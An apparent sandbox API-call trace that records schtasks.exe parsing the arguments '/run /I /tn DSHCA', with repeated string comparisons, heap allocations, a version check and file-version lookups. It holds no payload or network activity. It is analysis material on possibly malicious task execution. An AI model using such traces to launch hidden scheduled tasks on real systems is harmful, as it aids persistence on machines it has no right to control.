_memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.884] GetProcessHeap () returned 0x5e0000 [0215.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0xe) returned 0x5f4c08 [0215.884] _vsnwprintf (in: _Buffer=0x5f4bd8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|?|") returned 3 [0215.884] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|Run|") returned 5 [0215.884] lstrlenW (lpString="|?|") returned 3 [0215.884] lstrlenW (lpString="|Run|") returned 5 [0215.884] SetLastError (dwErrCode=0x490) [0215.884] lstrlenW (lpString="create") returned 6 [0215.884] lstrlenW (lpString="create") returned 6 [0215.884] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.884] GetProcessHeap () returned 0x5e0000 [0215.885] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4bd8) returned 1 [0215.885] GetProcessHeap () returned 0x5e0000 [0215.885] RtlReAllocateHeap (Heap=0x5e0000, Flags=0xc, Ptr=0x5f4bd8, Size=0x14) returned 0x5f5208 [0215.885] lstrlenW (lpString="Run") returned 3 [0215.885] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.885] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x9, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|create|") returned 8 [0215.885] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|Run|") returned 5 [0215.885] lstrlenW (lpString="|create|") returned 8 [0215.885] lstrlenW (lpString="|Run|") returned 5 [0215.885] StrStrIW (lpFirst="|create|", lpSrch="|Run|") returned 0x0 [0215.885] SetLastError (dwErrCode=0x490) [0215.885] lstrlenW (lpString="delete") returned 6 [0215.885] lstrlenW (lpString="delete") returned 6 [0215.885] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.885] lstrlenW (lpString="Run") returned 3 [0215.885] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.885] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x9, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|delete|") returned 8 [0215.885] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|Run|") returned 5 [0215.886] lstrlenW (lpString="|delete|") returned 8 [0215.886] lstrlenW (lpString="|Run|") returned 5 [0215.886] StrStrIW (lpFirst="|delete|", lpSrch="|Run|") returned 0x0 [0215.886] SetLastError (dwErrCode=0x490) [0215.886] lstrlenW (lpString="query") returned 5 [0215.886] lstrlenW (lpString="query") returned 5 [0215.886] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.886] lstrlenW (lpString="Run") returned 3 [0215.886] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.886] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x8, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|query|") returned 7 [0215.886] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|Run|") returned 5 [0215.886] lstrlenW (lpString="|query|") returned 7 [0215.886] lstrlenW (lpString="|Run|") returned 5 [0215.886] StrStrIW (lpFirst="|query|", lpSrch="|Run|") returned 0x0 [0215.886] SetLastError (dwErrCode=0x490) [0215.886] lstrlenW (lpString="change") returned 6 [0215.886] lstrlenW (lpString="change") returned 6 [0215.886] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.886] lstrlenW (lpString="Run") returned 3 [0215.887] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.887] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x9, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|change|") returned 8 [0215.887] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|Run|") returned 5 [0215.887] lstrlenW (lpString="|change|") returned 8 [0215.887] lstrlenW (lpString="|Run|") returned 5 [0215.887] StrStrIW (lpFirst="|change|", lpSrch="|Run|") returned 0x0 [0215.887] SetLastError (dwErrCode=0x490) [0215.887] lstrlenW (lpString="run") returned 3 [0215.887] lstrlenW (lpString="run") returned 3 [0215.887] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.887] lstrlenW (lpString="Run") returned 3 [0215.887] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.887] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|run|") returned 5 [0215.887] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|Run|") returned 5 [0215.887] lstrlenW (lpString="|run|") returned 5 [0215.887] lstrlenW (lpString="|Run|") returned 5 [0215.887] StrStrIW (lpFirst="|run|", lpSrch="|Run|") returned="|run|" [0215.887] SetLastError (dwErrCode=0x0) [0215.887] SetLastError (dwErrCode=0x0) [0215.888] SetLastError (dwErrCode=0x0) [0215.888] lstrlenW (lpString="/I") returned 2 [0215.888] lstrlenW (lpString="-/") returned 2 [0215.888] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0215.888] lstrlenW (lpString="?") returned 1 [0215.888] lstrlenW (lpString="?") returned 1 [0215.888] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.888] lstrlenW (lpString="I") returned 1 [0215.888] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.888] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|?|") returned 3 [0215.888] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|I|") returned 3 [0215.888] lstrlenW (lpString="|?|") returned 3 [0215.888] lstrlenW (lpString="|I|") returned 3 [0215.888] StrStrIW (lpFirst="|?|", lpSrch="|I|") returned 0x0 [0215.888] SetLastError (dwErrCode=0x490) [0215.888] lstrlenW (lpString="create") returned 6 [0215.888] lstrlenW (lpString="create") returned 6 [0215.888] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.889] lstrlenW (lpString="I") returned 1 [0215.889] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.889] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x9, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|create|") returned 8 [0215.889] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|I|") returned 3 [0215.889] lstrlenW (lpString="|create|") returned 8 [0215.889] lstrlenW (lpString="|I|") returned 3 [0215.889] StrStrIW (lpFirst="|create|", lpSrch="|I|") returned 0x0 [0215.889] SetLastError (dwErrCode=0x490) [0215.889] lstrlenW (lpString="delete") returned 6 [0215.889] lstrlenW (lpString="delete") returned 6 [0215.889] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.889] lstrlenW (lpString="I") returned 1 [0215.889] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.889] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x9, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|delete|") returned 8 [0215.889] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|I|") returned 3 [0215.890] lstrlenW (lpString="|delete|") returned 8 [0215.890] lstrlenW (lpString="|I|") returned 3 [0215.890] StrStrIW (lpFirst="|delete|", lpSrch="|I|") returned 0x0 [0215.890] SetLastError (dwErrCode=0x490) [0215.890] lstrlenW (lpString="query") returned 5 [0215.890] lstrlenW (lpString="query") returned 5 [0215.890] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.890] lstrlenW (lpString="I") returned 1 [0215.890] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.890] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x8, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|query|") returned 7 [0215.890] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|I|") returned 3 [0215.890] lstrlenW (lpString="|query|") returned 7 [0215.890] lstrlenW (lpString="|I|") returned 3 [0215.890] StrStrIW (lpFirst="|query|", lpSrch="|I|") returned 0x0 [0215.890] SetLastError (dwErrCode=0x490) [0215.890] lstrlenW (lpString="change") returned 6 [0215.890] lstrlenW (lpString="change") returned 6 [0215.890] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.891] lstrlenW (lpString="I") returned 1 [0215.891] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.892] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x9, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|change|") returned 8 [0215.892] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|I|") returned 3 [0215.892] lstrlenW (lpString="|change|") returned 8 [0215.892] lstrlenW (lpString="|I|") returned 3 [0215.892] StrStrIW (lpFirst="|change|", lpSrch="|I|") returned 0x0 [0215.892] SetLastError (dwErrCode=0x490) [0215.892] lstrlenW (lpString="run") returned 3 [0215.892] lstrlenW (lpString="run") returned 3 [0215.892] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.892] lstrlenW (lpString="I") returned 1 [0215.892] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.892] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|run|") returned 5 [0215.892] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|I|") returned 3 [0215.892] lstrlenW (lpString="|run|") returned 5 [0215.892] lstrlenW (lpString="|I|") returned 3 [0215.893] StrStrIW (lpFirst="|run|", lpSrch="|I|") returned 0x0 [0215.893] SetLastError (dwErrCode=0x490) [0215.893] lstrlenW (lpString="end") returned 3 [0215.893] lstrlenW (lpString="end") returned 3 [0215.893] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.893] lstrlenW (lpString="I") returned 1 [0215.893] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.893] _vsnwprintf (in: _Buffer=0x5f5208, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|end|") returned 5 [0215.893] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|I|") returned 3 [0215.893] lstrlenW (lpString="|end|") returned 5 [0215.893] lstrlenW (lpString="|I|") returned 3 [0215.893] StrStrIW (lpFirst="|end|", lpSrch="|I|") returned 0x0 [0215.893] SetLastError (dwErrCode=0x490) [0215.893] lstrlenW (lpString="showsid") returned 7 [0215.893] lstrlenW (lpString="showsid") returned 7 [0215.893] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.893] GetProcessHeap () returned 0x5e0000 [0215.893] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5208) returned 1 [0215.893] GetProcessHeap () returned 0x5e0000 [0215.893] RtlReAllocateHeap (Heap=0x5e0000, Flags=0xc, Ptr=0x5f5208, Size=0x16) returned 0x5f5228 [0215.893] lstrlenW (lpString="I") returned 1 [0215.893] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.894] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0xa, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|showsid|") returned 9 [0215.894] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|I|") returned 3 [0215.894] lstrlenW (lpString="|showsid|") returned 9 [0215.894] lstrlenW (lpString="|I|") returned 3 [0215.894] StrStrIW (lpFirst="|showsid|", lpSrch="|I|") returned 0x0 [0215.894] SetLastError (dwErrCode=0x490) [0215.894] SetLastError (dwErrCode=0x490) [0215.894] SetLastError (dwErrCode=0x0) [0215.894] lstrlenW (lpString="/I") returned 2 [0215.894] StrChrIW (lpStart="/I", wMatch=0x3a) returned 0x0 [0215.894] SetLastError (dwErrCode=0x490) [0215.894] SetLastError (dwErrCode=0x0) [0215.894] lstrlenW (lpString="/I") returned 2 [0215.894] GetProcessHeap () returned 0x5e0000 [0215.894] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x6) returned 0x5f5b80 [0215.894] GetProcessHeap () returned 0x5e0000 [0215.894] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5208 [0215.894] SetLastError (dwErrCode=0x0) [0215.894] SetLastError (dwErrCode=0x0) [0215.894] lstrlenW (lpString="/tn") returned 3 [0215.894] lstrlenW (lpString="-/") returned 2 [0215.894] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0215.894] lstrlenW (lpString="?") returned 1 [0215.894] lstrlenW (lpString="?") returned 1 [0215.894] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.894] lstrlenW (lpString="tn") returned 2 [0215.894] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.895] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x4, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|?|") returned 3 [0215.895] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|tn|") returned 4 [0215.895] lstrlenW (lpString="|?|") returned 3 [0215.895] lstrlenW (lpString="|tn|") returned 4 [0215.895] SetLastError (dwErrCode=0x490) [0215.895] lstrlenW (lpString="create") returned 6 [0215.895] lstrlenW (lpString="create") returned 6 [0215.895] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.895] lstrlenW (lpString="tn") returned 2 [0215.895] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.895] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x9, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|create|") returned 8 [0215.895] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|tn|") returned 4 [0215.895] lstrlenW (lpString="|create|") returned 8 [0215.895] lstrlenW (lpString="|tn|") returned 4 [0215.895] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0215.895] SetLastError (dwErrCode=0x490) [0215.895] lstrlenW (lpString="delete") returned 6 [0215.895] lstrlenW (lpString="delete") returned 6 [0215.895] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.895] lstrlenW (lpString="tn") returned 2 [0215.895] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.895] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x9, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|delete|") returned 8 [0215.895] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|tn|") returned 4 [0215.896] lstrlenW (lpString="|delete|") returned 8 [0215.896] lstrlenW (lpString="|tn|") returned 4 [0215.896] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0215.896] SetLastError (dwErrCode=0x490) [0215.896] lstrlenW (lpString="query") returned 5 [0215.896] lstrlenW (lpString="query") returned 5 [0215.896] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.896] lstrlenW (lpString="tn") returned 2 [0215.896] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.896] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x8, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|query|") returned 7 [0215.896] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|tn|") returned 4 [0215.896] lstrlenW (lpString="|query|") returned 7 [0215.896] lstrlenW (lpString="|tn|") returned 4 [0215.896] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0215.896] SetLastError (dwErrCode=0x490) [0215.896] lstrlenW (lpString="change") returned 6 [0215.896] lstrlenW (lpString="change") returned 6 [0215.896] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.896] lstrlenW (lpString="tn") returned 2 [0215.896] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.896] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x9, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|change|") returned 8 [0215.897] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|tn|") returned 4 [0215.897] lstrlenW (lpString="|change|") returned 8 [0215.897] lstrlenW (lpString="|tn|") returned 4 [0215.897] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0215.897] SetLastError (dwErrCode=0x490) [0215.897] lstrlenW (lpString="run") returned 3 [0215.897] lstrlenW (lpString="run") returned 3 [0215.897] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.897] lstrlenW (lpString="tn") returned 2 [0215.897] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.897] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|run|") returned 5 [0215.897] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|tn|") returned 4 [0215.897] lstrlenW (lpString="|run|") returned 5 [0215.897] lstrlenW (lpString="|tn|") returned 4 [0215.897] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0215.897] SetLastError (dwErrCode=0x490) [0215.897] lstrlenW (lpString="end") returned 3 [0215.897] lstrlenW (lpString="end") returned 3 [0215.897] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.897] lstrlenW (lpString="tn") returned 2 [0215.897] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.897] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0x6, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|end|") returned 5 [0215.897] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|tn|") returned 4 [0215.898] lstrlenW (lpString="|end|") returned 5 [0215.898] lstrlenW (lpString="|tn|") returned 4 [0215.898] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0215.898] SetLastError (dwErrCode=0x490) [0215.898] lstrlenW (lpString="showsid") returned 7 [0215.898] lstrlenW (lpString="showsid") returned 7 [0215.898] _memicmp (_Buf1=0x5f4bc0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.898] lstrlenW (lpString="tn") returned 2 [0215.898] _memicmp (_Buf1=0x5f4bf0, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.898] _vsnwprintf (in: _Buffer=0x5f5228, _BufferCount=0xa, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|showsid|") returned 9 [0215.898] _vsnwprintf (in: _Buffer=0x5f4c08, _BufferCount=0x5, _Format="|%s|", _ArgList=0x14f460 | out: _Buffer="|tn|") returned 4 [0215.898] lstrlenW (lpString="|showsid|") returned 9 [0215.898] lstrlenW (lpString="|tn|") returned 4 [0215.898] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0215.898] SetLastError (dwErrCode=0x490) [0215.898] SetLastError (dwErrCode=0x490) [0215.898] SetLastError (dwErrCode=0x0) [0215.898] lstrlenW (lpString="/tn") returned 3 [0215.898] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0215.898] SetLastError (dwErrCode=0x490) [0215.898] SetLastError (dwErrCode=0x0) [0215.898] lstrlenW (lpString="/tn") returned 3 [0215.898] GetProcessHeap () returned 0x5e0000 [0215.898] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x8) returned 0x5f5b90 [0215.898] GetProcessHeap () returned 0x5e0000 [0215.899] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5248 [0215.899] SetLastError (dwErrCode=0x0) [0215.899] SetLastError (dwErrCode=0x0) [0215.899] lstrlenW (lpString="DSHCA") returned 5 [0215.899] lstrlenW (lpString="-/") returned 2 [0215.899] StrChrIW (lpStart="-/", wMatch=0x44) returned 0x0 [0215.899] SetLastError (dwErrCode=0x490) [0215.899] SetLastError (dwErrCode=0x490) [0215.899] SetLastError (dwErrCode=0x0) [0215.899] lstrlenW (lpString="DSHCA") returned 5 [0215.899] StrChrIW (lpStart="DSHCA", wMatch=0x3a) returned 0x0 [0215.899] SetLastError (dwErrCode=0x490) [0215.899] SetLastError (dwErrCode=0x0) [0215.899] lstrlenW (lpString="DSHCA") returned 5 [0215.899] GetProcessHeap () returned 0x5e0000 [0215.899] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0xc) returned 0x5f4bd8 [0215.899] GetProcessHeap () returned 0x5e0000 [0215.899] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5268 [0215.899] SetLastError (dwErrCode=0x0) [0215.899] GetProcessHeap () returned 0x5e0000 [0215.899] GetProcessHeap () returned 0x5e0000 [0215.899] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5b80) returned 1 [0215.899] GetProcessHeap () returned 0x5e0000 [0215.899] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5b80) returned 0x6 [0215.899] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5b80 | out: hHeap=0x5e0000) returned 1 [0215.899] GetProcessHeap () returned 0x5e0000 [0215.899] GetProcessHeap () returned 0x5e0000 [0215.899] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5208) returned 1 [0215.899] GetProcessHeap () returned 0x5e0000 [0215.899] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5208) returned 0x14 [0215.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5208 | out: hHeap=0x5e0000) returned 1 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5b90) returned 1 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5b90) returned 0x8 [0215.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5b90 | out: hHeap=0x5e0000) returned 1 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5248) returned 1 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5248) returned 0x14 [0215.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5248 | out: hHeap=0x5e0000) returned 1 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4bd8) returned 1 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4bd8) returned 0xc [0215.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4bd8 | out: hHeap=0x5e0000) returned 1 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5268) returned 1 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5268) returned 0x14 [0215.900] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5268 | out: hHeap=0x5e0000) returned 1 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.900] GetProcessHeap () returned 0x5e0000 [0215.901] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ab8) returned 1 [0215.901] GetProcessHeap () returned 0x5e0000 [0215.901] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4ab8) returned 0x10 [0215.901] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ab8 | out: hHeap=0x5e0000) returned 1 [0215.901] SetLastError (dwErrCode=0x0) [0215.901] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0215.901] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0215.901] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0215.901] VerifyVersionInfoW (in: lpVersionInformation=0x14f2a4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x14f2a4) returned 1 [0215.901] SetLastError (dwErrCode=0x0) [0215.901] lstrlenW (lpString="run") returned 3 [0215.901] StrChrIW (lpStart="run", wMatch=0x7c) returned 0x0 [0215.901] SetLastError (dwErrCode=0x490) [0215.901] SetLastError (dwErrCode=0x0) [0215.901] lstrlenW (lpString="run") returned 3 [0215.901] GetProcessHeap () returned 0x5e0000 [0215.901] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x14) returned 0x5f5268 [0215.901] GetProcessHeap () returned 0x5e0000 [0215.901] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4ab8 [0215.901] _memicmp (_Buf1=0x5f4ab8, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.901] GetProcessHeap () returned 0x5e0000 [0215.901] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x10) returned 0x5f4bd8 [0215.901] SetLastError (dwErrCode=0x0) [0215.901] _memicmp (_Buf1=0x5f4b30, _Buf2=0x1d1ed8, _Size=0x7) returned 0 [0215.902] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5f5970, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0215.902] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0215.902] GetProcessHeap () returned 0x5e0000 [0215.902] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0xc, Size=0x74e) returned 0x5f5b80 [0215.902] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x5f5b80 | out: lpData=0x5f5b80) returned 1 [0215.902] VerQueryValueW (in: pBlock=0x5f5b80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14f3ac, puLen=0x14f3b0 | out: lplpBuffer=0x14f3ac*=0x5f5f1c, puLen=0x14f3b0) returned 1 